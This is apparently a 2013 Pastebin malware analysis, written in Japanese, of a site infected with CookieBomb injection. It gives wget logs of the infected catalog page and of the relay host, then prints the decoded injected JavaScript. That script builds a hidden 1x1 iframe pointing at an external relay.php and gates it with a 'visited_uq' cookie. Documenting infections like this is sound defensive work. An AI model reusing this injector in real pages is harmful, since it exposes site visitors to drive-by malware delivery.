Advertisement
unixfreaxjp

CookieBombインジェクションに感染されたサイトのアクセスログ...

Jul 15th, 2013
95
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // CookieBombインジェクションに感染されたサイトのアクセスログ...
  2.  
  3. --2013-07-15 16:57:36-- hxxp://www.antjapan.co.jp/catalog/
  4. Resolving www.antjapan.co.jp... 211.10.17.56
  5. Caching www.antjapan.co.jp => 211.10.17.56
  6. Connecting to www.antjapan.co.jp|211.10.17.56|:80... connected.
  7. :
  8. GET /catalog/ HTTP/1.1
  9. Host: www.antjapan.co.jp
  10. HTTP request sent, awaiting response...
  11. :
  12. HTTP/1.1 200 OK
  13. Date: Mon, 15 Jul 2013 07:55:25 GMT
  14. Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
  15. X-Powered-By: PHP/4.4.4
  16. Set-Cookie: osCsid=e1c9ded7019391417e944b64b8cbf1a4; path=/catalog
  17. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  18. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  19. Pragma: no-cache
  20. Keep-Alive: timeout=10, max=128
  21. Connection: Keep-Alive
  22. Transfer-Encoding: chunked
  23. Content-Type: text/html; charset=EUC-JP
  24. 200 OK
  25. :
  26. Length: unspecified [text/html]
  27. Saving to: ‘index.html’
  28. 2013-07-15 16:57:36 (200 KB/s) - ‘index.html’ saved [4959]
  29.  
  30. // index.htmlにオOCJP-112のマルウェア感染コードを発見しました。
  31.  
  32. // decodeすると...
  33.  
  34. function zzzfff(){
  35. var h = document.createElement('iframe');
  36. h.src = 'hxxp://www.verdaedevelopment.com/_js/relay.php';
  37. h.style.position = 'absolute';
  38. h.style.border = '0';
  39. h.style.height = '1px';
  40. h.style.width = '1px';
  41. h.style.left = '1px';
  42. h.style.top = '1px';
  43. if (!document.getElementById('h')){
  44. document.write('<div id=\'h\'></div>');
  45. document.getElementById('h').appendChild(h);
  46. }
  47. }
  48. function SetCookie(cookieName, cookieValue, nDays, path){
  49. var today = new Date();
  50. var expire = new Date();
  51. if (nDays == null || nDays == 0)nDays = 1;
  52. expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  53. document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  54. toGMTString() + ((path) ? "; path=" + path : "");
  55. }
  56. function GetCookie(name){
  57. var start = document.cookie.indexOf(name + "=");
  58. var len = start + name.length + 1;
  59. if ((!start) && (name != document.cookie.substring(0, name.length))){
  60. return null;
  61. }
  62. if (start == - 1)return null;
  63. var end = document.cookie.indexOf(";", len);
  64. if (end == - 1)end = document.cookie.length;
  65. return unescape(document.cookie.substring(len, end));
  66. }
  67. if (navigator.cookieEnabled){
  68. if (GetCookie('visited_uq') == 55){
  69. }
  70. else {
  71. SetCookie('visited_uq', '55', '1', '/');
  72. zzzfff();
  73. }
  74. }
  75.  
  76. // マルウェアのリンクをフォローすると....
  77.  
  78. --2013-07-15 17:06:16-- hxxp://www.verdaedevelopment.com/_js/relay.php
  79. Resolving www.verdaedevelopment.com... 174.120.172.123
  80. Caching www.verdaedevelopment.com => 174.120.172.123
  81. Connecting to www.verdaedevelopment.com|174.120.172.123|:80... connected.
  82. :
  83. GET /_js/relay.php HTTP/1.1
  84. Referer: http://www.antjapan.co.jp/catalog/
  85. Host: www.verdaedevelopment.com
  86. HTTP request sent, awaiting response...
  87. :
  88. HTTP/1.1 200 OK
  89. Date: Mon, 15 Jul 2013 08:04:06 GMT
  90. Server: Apache
  91. Keep-Alive: timeout=5, max=75
  92. Connection: Keep-Alive
  93. Transfer-Encoding: chunked
  94. Content-Type: text/html
  95. 200 OK
  96. Length: unspecified [text/html]
  97. Saving to: ‘relay.php’
  98. 2013-07-15 17:06:17 (20.8 KB/s) - ‘relay.php’ saved [2]
  99.  
  100. // 「relay.php」はマルウェア転送スクリプトで、条件/タイミングが合わないと「ok」などの回答が出る。
  101. $ cat relay.php
  102. ok
Advertisement
RAW Paste Data Copied
Advertisement